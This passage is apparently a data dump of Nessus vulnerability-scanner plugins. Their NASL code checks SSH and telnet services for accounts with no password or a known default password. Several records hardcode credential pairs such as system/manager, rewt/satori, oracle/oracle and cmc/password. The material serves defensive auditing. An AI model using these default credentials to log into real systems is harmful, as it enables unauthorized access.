audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:05:56", "description": "The account 'lp' has no password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'lp' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_LP.NASL", "href": "https://www.tenable.com/plugins/nessus/11246", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"lp\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11246);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'lp' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'lp' has no password set. An attacker may use this\nto gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"os_fingerprint.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif ( ! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n{\nos = get_kb_item(\"Host/OS\");\nif ( os && \"IRIX\" >!< os )\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set, and the remote OS is not IRIX.\");\n}\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:56", "description": "The account 'friday' has no password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'friday' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_FRIDAY.NASL", "href": "https://www.tenable.com/plugins/nessus/11254", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"friday\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11254);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'friday' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'friday' has no password set. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude('global_settings.inc');\ninclude(\"default_account.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:56", "description": "The account 'jill' has no password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'jill' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_JILL.NASL", "href": "https://www.tenable.com/plugins/nessus/11266", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"jill\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11266);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'jill' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'jill' has no password set. An attacker may use this\nto gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude('global_settings.inc');\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:29", "description": "The account 'system' has the password 'manager'. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Default Password (manager) for 'system' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_SYSTEM_MANAGER.NASL", "href": "https://www.tenable.com/plugins/nessus/11257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"system\";\npassword = \"manager\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11257);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (manager) for 'system' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'system' has the password 'manager'. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:31", "description": "The account 'demos' has no password set. An attacker may use this account to gain further privileges on the system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'demos' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_DEMOS.NASL", "href": "https://www.tenable.com/plugins/nessus/11242", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"demos\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11242);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'demos' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'demos' has no password set. An attacker may use this\naccount to gain further privileges on the system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude('global_settings.inc');\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:31", "description": "The account 'rewt' has the password 'satori'. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Default Password (satori) for 'rewt' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_REWT_SATORI.NASL", "href": "https://www.tenable.com/plugins/nessus/11265", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"rewt\";\npassword = \"satori\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11265);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (satori) for 'rewt' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'rewt' has the password 'satori'. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:28:49", "description": "The password for the account 'oracle' on the remote host is 'oracle'. An attacker may leverage this to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2007-02-06T00:00:00", "type": "nessus", "title": "Default Password (oracle) for 'oracle' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ORACLE_ORACLE.NASL", "href": "https://www.tenable.com/plugins/nessus/24276", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"oracle\";\npassword = \"oracle\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24276);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (oracle) for 'oracle' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The password for the account 'oracle' on the remote host is 'oracle'. \nAn attacker may leverage this to gain access to the affected system\nand launch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:11:31", "description": "The account 'cmc' on the remote host has the default password 'password'. An attacker can leverage this issue to gain administrative access to the affected system.\n\nNote that SolarWinds Log and Event Manager is known to use these credentials to provide complete, administrative access to the virtual appliance.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-11-07T00:00:00", "type": "nessus", "title": "Default Password (password) for 'cmc' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_CMC_LEM.NASL", "href": "https://www.tenable.com/plugins/nessus/78914", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"cmc\";\npassword = \"password\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78914);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (password) for 'cmc' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'cmc' on the remote host has the default password\n'password'. An attacker can leverage this issue to gain administrative\naccess to the affected system.\n\nNote that SolarWinds Log and Event Manager is known to use these\ncredentials to provide complete, administrative access to the virtual\nappliance.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 